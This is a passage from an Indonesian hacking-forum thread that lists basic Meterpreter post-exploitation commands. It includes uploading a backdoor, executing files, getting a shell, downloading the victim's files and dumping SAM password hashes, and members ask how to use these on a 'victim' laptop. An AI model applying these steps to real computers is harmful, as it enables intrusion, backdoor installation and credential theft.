Perintah Dasar Meterpreter
#31
test drive dlo...

#32
kak syntax buat kita download file dari laptop kita ke leptop korban gmna???
and exsekusinya gmna???

#33
(06-29-2012, 09:47 PM)newbie212 Wrote: kak syntax buat kita download file dari laptop kita ke leptop korban gmna???
and exsekusinya gmna???

itu upload namanya om

untuk upload pake perintah

Code:
upload [dir path file] [dir tujuan]

untuk menjalankan

Code:
execute ­-f  [dir path file]

#34
Thumbs Up 
thank's Mas brow sngt membantu

#35
Ini dia yang ane cari ...!
Thank's a lot banget om Wink :d :-bd

#36
Terima kasih, Kang. Lumayan ada gambaran. Bisa ambil shell komputer lain begitu. Kayak BO2000 zaman dulu. Tapi...

...meterpreter itu apa, sih?

#37
ane mah ijin copas aja om =))
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#38
mau nanya nih brother BT klo ngopi directory dr komptr korban ke komputer kita gmn yah, kita sudah di meterpreter:
sya pake perintah ini kok gk jalan ya :

meterpreter > download d:\\brother installation

(misal nya mau kopi dir brother installation)

mohon petunjukknya:-bd

#39
(10-10-2011, 10:32 AM)NoseTrave Wrote:
Quote:Assalamualaikum Wr. Wb.

Yang Terhormat Founder IBTeam, Yang Terhormat Administrator, Yang Terhormat Moderator, Yang Terhormat Costumer-Service, Yang Terhormat Trainess Dan Seluruh Member, Keluarga Besar IBTeam.

Mohon Maaf Yang Sebesar-Besarnya, Karena Telah Lancang Membuat Thread.
Kalau Ada Salah/Error Pada Thread Yang Saya Buat, Mohon Langsung Di Close Dan Banned Ip dan ID saya.

Ini Bukan Tulisan Aku!
Tapi Mudah Mudahan Bermanfaat

Buat yang sering menggunkan Metasploit pasti sudah sering menggunakan beberapa perintah dibawah ini ketika sudah mendapatkan meterpreter, jadi buat yang ingin mendalami Metasploit, ini adalah wajib untuk dipelajari,termasuk ane,hoho..

1. help
Perintah ' help ' akan menampilkan menu help pada terminal.

2. background
Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

3. ps
Perintah ' ps ' digunakan untuk menampilkan proses yang sedang berjalan.

4. migate
Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain.

5. ls
Perintah ' ls ' digunakan untuk menampilkan daftar file dari sebuah folder tempat kita berada.

6. download
Perintah ' download ' adalah untuk mendownload file dari komputer korban, dan gunakan double-slashes ( \\ )untuk menetapkan direktori.

7. upload
Perintah ' upload ' adalah untuk mengupload file kedalam komputer korban(biasanya backdoor), dan gunakan double-slashes.

8. ipconfig
Perintah ' ipconfig ' untuk menampilkan kartu jaringan/network interfaces dan alamat korban.

9. getuid
Perintah ' getuid ' adalah untuk menampilkan hostname dari komputer korban.

10. execute
Perintah ' execute ' adalah untuk menjalankan aplikasi para komputer korban.

11. shell
Perintah ' shell ' adalah perintah untuk mendapatkan shell dari komputer korban(biasanya command Prompt windows).

12. idletime
Perintah ' idletime ' adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

13. hasdump
Perintah ' hashdump ' untuk menampilkan data dari SAM file.

14. ?
Perintah ' ? ' adalah untuk menampilkan help dari meterpreter.

15. channel
Perintah ' channel ' untuk menampilkan channel yang sedang aktif.

16. close
Perintah ' close ' untuk keluar dari channel.

17. exit
Perintah ' exit ' untuk keluar dari session yang sedang aktif.

18. interact
Perintah ' interact ' untuk interaksi dengan channel.

19. irb
Perintah ' irb ' untuk menjalankan ruby shell command.

20. quit
Perintah ' quit ' kembali kepada terminal meterpreter dan keluar dari session yang aktif.

21. read
Perintah ' read ' membaca data dari channel.

22. run
Perintah ' run ' untuk dapat menjalankan script meterpreter.

23. write
Perintah ' write ' digunakan untuk menulis kedalam channel.

24. cat
Perintah ' cat ' digunakan untuk membaca sebuah file.


Sebenernya Masih Banyak Perintah-Perintah Lainya.

Semoga Bermanfaat!

makasih bang bro Smile





Users browsing this thread: 2 Guest(s)